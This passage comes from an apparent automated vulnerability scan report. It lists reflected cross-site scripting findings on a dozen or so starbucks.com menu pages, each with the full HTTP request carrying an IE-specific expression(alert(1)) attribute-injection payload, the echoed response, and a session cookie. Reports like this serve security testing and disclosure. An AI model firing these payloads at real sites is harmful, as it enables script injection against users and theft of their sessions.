This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style%3d"x%3aexpression(alert(1))"257fad08362=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:37 GMT
Connection: close
Content-Length: 43317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style="x:expression(alert(1))"257fad08362=1"/>
...[SNIP]...

2.167. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e66f5"style="x:expression(alert(1))"08de845d79f in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:46 GMT
Connection: close
Content-Length: 44708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style="x:expression(alert(1))"08de845d79f=1"/>
...[SNIP]...

2.168. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ca72"style="x:expression(alert(1))"9fca5104888 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:32 GMT
Connection: close
Content-Length: 45465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style="x:expression(alert(1))"9fca5104888=1"/>
...[SNIP]...

2.169. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e85c"style%3d"x%3aexpression(alert(1))"331368f0807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e85c"style="x:expression(alert(1))"331368f0807 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style%3d"x%3aexpression(alert(1))"331368f0807=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:03 GMT
Connection: close
Content-Length: 45253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style="x:expression(alert(1))"331368f0807=1"/>
...[SNIP]...

2.170. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b41a"style="x:expression(alert(1))"7c9d6c61240 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:43 GMT
Connection: close
Content-Length: 45282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style="x:expression(alert(1))"7c9d6c61240=1"/>
...[SNIP]...

2.171. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a8c8"style="x:expression(alert(1))"fd9920fedb7 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:59 GMT
Connection: close
Content-Length: 45430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style="x:expression(alert(1))"fd9920fedb7=1"/>
...[SNIP]...

2.172. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5ef7"style="x:expression(alert(1))"69f7e0c5087 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:13 GMT
Connection: close
Content-Length: 45272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style="x:expression(alert(1))"69f7e0c5087=1"/>
...[SNIP]...

2.173. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf9f7"style="x:expression(alert(1))"70fdedd5bf5 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:59 GMT
Connection: close
Content-Length: 45570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style="x:expression(alert(1))"70fdedd5bf5=1"/>
...[SNIP]...

2.174. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/caramel-apple-spice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb864"style%3d"x%3aexpression(alert(1))"66df403bea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb864"style="x:expression(alert(1))"66df403bea2 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style%3d"x%3aexpression(alert(1))"66df403bea2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:34 GMT
Connection: close
Content-Length: 41154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style="x:expression(alert(1))"66df403bea2=1"/>
...[SNIP]...

2.175. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/cold-apple-juice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 563c7"style="x:expression(alert(1))"b209836fbc5 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:36 GMT
Connection: close
Content-Length: 40523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style="x:expression(alert(1))"b209836fbc5=1"/>
...[SNIP]...

2.176. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/flavored-steamed-milk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ee49"style="x:expression(alert(1))"6f89d6acc18 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:25 GMT
Connection: close
Content-Length: 41188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style="x:expression(alert(1))"6f89d6acc18=1"/>
...[SNIP]...

2.177. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/milk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28684"style="x:expression(alert(1))"1f8573fecb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/milk?28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:11 GMT
Connection: close
Content-Length: 40785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk?28684"style="x:expression(alert(1))"1f8573fecb9=1"/>
...[SNIP]...

2.178. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/steamed-apple-juice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39769"style%3d"x%3aexpression(alert(1))"720efc59f16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39769"style="x:expression(alert(1))"720efc59f16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style%3d"x%3aexpression(alert(1))"720efc59f16=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:10 GMT
Connection: close
Content-Length: 40599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style="x:expression(alert(1))"720efc59f16=1"/>
...[SNIP]...

2.179. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f97"style%3d"x%3aexpression(alert(1))"47495068b64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92f97"style="x:expression(alert(1))"47495068b64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/awake?92f97"style%3d"x%3aexpression(alert(1))"47495068b64=1 HTTP/1.1
